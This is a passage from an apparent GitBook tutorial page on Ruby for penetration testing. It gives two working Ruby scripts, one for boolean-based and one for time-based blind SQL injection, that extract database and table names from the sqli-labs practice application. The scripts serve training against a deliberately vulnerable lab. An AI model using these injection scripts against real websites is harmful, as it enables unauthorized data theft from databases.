  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">red</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[31m&quot;</span>); <span class="hljs-keyword">end</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">green</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[32m&quot;</span>); <span class="hljs-keyword">end</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">bold</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m&quot;</span>); <span class="hljs-keyword">end</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">colorize</span><span class="hljs-params">(text, color_code)</span>  &quot;<span class="hljs-comment">#{color_code}#{text}\e[0m&quot; end</span></span>
<span class="hljs-keyword">end</span>

<span class="hljs-comment"># SQL injection</span>
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send_bbsqli</span><span class="hljs-params">(url, query)</span></span>
  <span class="hljs-keyword">begin</span>

    response = open(<span class="hljs-constant">URI</span>.parse( <span class="hljs-constant">URI</span>.encode(<span class="hljs-string">&quot;<span class="hljs-subst">#{url}</span><span class="hljs-subst">#{query}</span>&quot;</span>) ))

    <span class="hljs-keyword">if</span> !response.read.scan(<span class="hljs-string">&quot;You are in...........&quot;</span>).empty?
      <span class="hljs-keyword">return</span> <span class="hljs-number">1</span> <span class="hljs-comment"># TRUE</span>
    <span class="hljs-keyword">end</span>

  <span class="hljs-keyword">rescue</span> <span class="hljs-constant">Exception</span> =&gt; e
    puts <span class="hljs-string">&quot;[!] Failed to SQL inject <span class="hljs-subst">#{e}</span>&quot;</span>.red 
    exit <span class="hljs-number">0</span>
  <span class="hljs-keyword">end</span>
<span class="hljs-keyword">end</span>

url = <span class="hljs-string">&quot;http://<span class="hljs-subst">#{host}</span>/sqli-labs/Less-8/index.php?id=&quot;</span>

puts <span class="hljs-string">&quot;[*] Start Sending Boolean-based SQLi&quot;</span>.bold

extracted = []
(<span class="hljs-number">1</span>..<span class="hljs-number">100</span>).map <span class="hljs-keyword">do</span> |position|
  (<span class="hljs-number">32</span>..<span class="hljs-number">126</span>).map <span class="hljs-keyword">do</span> |char|
     puts <span class="hljs-string">&quot;[*] Brute-forcing on Position: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{position}</span>&quot;</span>.green + <span class="hljs-string">&quot; | &quot;</span>.bold + <span class="hljs-string">&quot;Character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char}</span> = <span class="hljs-subst">#{char.chr}</span>&quot;</span>.green

     <span class="hljs-comment"># Put your query here </span>
<span class="hljs-comment">#      query = &quot;1&apos; AND (ASCII(SUBSTR((SELECT DATABASE()),#{position},1)))=#{char}--+&quot;</span>
     query = <span class="hljs-string">&quot;1&apos; AND (ASCII(SUBSTR((SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1),<span class="hljs-subst">#{position}</span>,1)))=<span class="hljs-subst">#{char}</span>--+&quot;</span>
     result = send_bbsqli(url, query)
         <span class="hljs-keyword">if</span> result.eql? <span class="hljs-number">1</span>
           puts <span class="hljs-string">&quot;[+] Found character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char.to_s(<span class="hljs-number">16</span>)}</span> hex&quot;</span>.green

           extracted &lt;&lt;  char.chr
           puts <span class="hljs-string">&quot;[+] Extracted characters: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
           <span class="hljs-keyword">break</span> 
         <span class="hljs-keyword">end</span>
   <span class="hljs-keyword">end</span>
<span class="hljs-keyword">end</span>

puts <span class="hljs-string">&quot;\n\n[+] Final found string: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
</code></pre>
<h2 id="timebases-sqli-exploit-script"><a name="timebases-sqli-exploit-script" class="plugin-anchor" href="#timebases-sqli-exploit-script"><span class="fa fa-link"></span></a>Time-bases SQLi Exploit Script</h2>
<p>A Time-based SQLi exploit for <a href="https://github.com/Audi-1/sqli-labs" target="_blank">sqli-labs</a> vulnerable application.</p>
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
<span class="hljs-comment"># Boolean-based SQLi exploit</span>
<span class="hljs-comment"># Sabri Saleh | <span class="hljs-doctag">@KINGSABRI</span></span>
<span class="hljs-comment">#</span>
<span class="hljs-keyword">require</span> <span class="hljs-string">&apos;open-uri&apos;</span>

<span class="hljs-keyword">if</span> <span class="hljs-constant">ARGV</span>.size &lt; <span class="hljs-number">1</span>
  puts <span class="hljs-string">&quot;[+] ruby <span class="hljs-subst">#{__FILE_<span class="hljs-number">_</span>}</span> &lt;IP ADDRESS&gt;&quot;</span>
  exit <span class="hljs-number">0</span>
<span class="hljs-keyword">else</span>
  host = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">0</span>]
<span class="hljs-keyword">end</span>

<span class="hljs-comment"># Just colorizing outputs</span>
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">String</span></span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">red</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[31m&quot;</span>); <span class="hljs-keyword">end</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">green</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[32m&quot;</span>); <span class="hljs-keyword">end</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">bold</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m&quot;</span>); <span class="hljs-keyword">end</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">colorize</span><span class="hljs-params">(text, color_code)</span>  &quot;<span class="hljs-comment">#{color_code}#{text}\e[0m&quot; end</span></span>
<span class="hljs-keyword">end</span>

<span class="hljs-comment"># SQL injection</span>
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send_tbsqli</span><span class="hljs-params">(url, query, time2wait)</span></span>
  <span class="hljs-keyword">begin</span>
    start_time = <span class="hljs-constant">Time</span>.now
    response = open(<span class="hljs-constant">URI</span>.parse( <span class="hljs-constant">URI</span>.encode(<span class="hljs-string">&quot;<span class="hljs-subst">#{url}</span><span class="hljs-subst">#{query}</span>&quot;</span>) ))
    end_time   = <span class="hljs-constant">Time</span>.now
    howlong    = end_time - start_time

    <span class="hljs-keyword">if</span> howlong &gt;= time2wait
      <span class="hljs-keyword">return</span> <span class="hljs-number">1</span> <span class="hljs-comment"># TRUE</span>
    <span class="hljs-keyword">end</span>

  <span class="hljs-keyword">rescue</span> <span class="hljs-constant">Exception</span> =&gt; e
    puts <span class="hljs-string">&quot;[!] Failed to SQL inject <span class="hljs-subst">#{e}</span>&quot;</span>.red 
    exit <span class="hljs-number">0</span>
  <span class="hljs-keyword">end</span>
<span class="hljs-keyword">end</span>

url = <span class="hljs-string">&quot;http://<span class="hljs-subst">#{host}</span>/sqli-labs/Less-10/index.php?id=&quot;</span>

puts <span class="hljs-string">&quot;[*] Start Sending Boolean-based SQLi&quot;</span>.bold
time2wait = <span class="hljs-number">5</span>
extracted = []
(<span class="hljs-number">1</span>..<span class="hljs-number">76</span>).map <span class="hljs-keyword">do</span> |position| 
  (<span class="hljs-number">32</span>..<span class="hljs-number">126</span>).map <span class="hljs-keyword">do</span> |char|
     puts <span class="hljs-string">&quot;[*] Brute-forcing on Position: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{position}</span>&quot;</span>.green + <span class="hljs-string">&quot; | &quot;</span>.bold + <span class="hljs-string">&quot;Character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char}</span> = <span class="hljs-subst">#{char.chr}</span>&quot;</span>.green

     <span class="hljs-comment"># Put your query here </span>
     query = <span class="hljs-string">&quot;1\&quot; AND IF((ASCII(SUBSTR((SELECT DATABASE()),<span class="hljs-subst">#{position}</span>,1)))=<span class="hljs-subst">#{char}</span>, SLEEP(<span class="hljs-subst">#{time2wait}</span>), NULL)--+&quot;</span>

     result = send_tbsqli(url, query, time2wait)
         <span class="hljs-keyword">if</span> result.eql? <span class="hljs-number">1</span>
           puts <span class="hljs-string">&quot;[+] Found character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char.to_s(<span class="hljs-number">16</span>)}</span> hex&quot;</span>.green

           extracted &lt;&lt;  char.chr
           puts <span class="hljs-string">&quot;[+] Extracted characters: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
           <span class="hljs-keyword">break</span> 
         <span class="hljs-keyword">end</span>
   <span class="hljs-keyword">end</span>
<span class="hljs-keyword">end</span>

puts <span class="hljs-string">&quot;\n\n[+] Final found string: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
</code></pre>

                    
                    </section>
                
                
                </div>
            </div>
        </div>

        
        <a href="../module_0x4__web_kung_fu/index.html" class="navigation navigation-prev " aria-label="Previous page: Module 0x4 | Web Kung Fu"><i class="fa fa-angle-left"></i></a>
        
        
        <a href="../module_0x4__web_kung_fu/databases.html" class="navigation navigation-next " aria-label="Next page: Databases"><i class="fa fa-angle-right"></i></a>
        
    </div>
</div>

        
<script src="../gitbook/app.js"></script>

    
    <script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
    

    
    <script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
    

    
    <script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
    

    
    <script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
    

    
    <script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
    

    
    <script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
    

    
    <script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
    

<script>
require(["gitbook"], function(gitbook) {
    var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
    gitbook.start(config);
});
</script>

        
    </body>
    
</html>
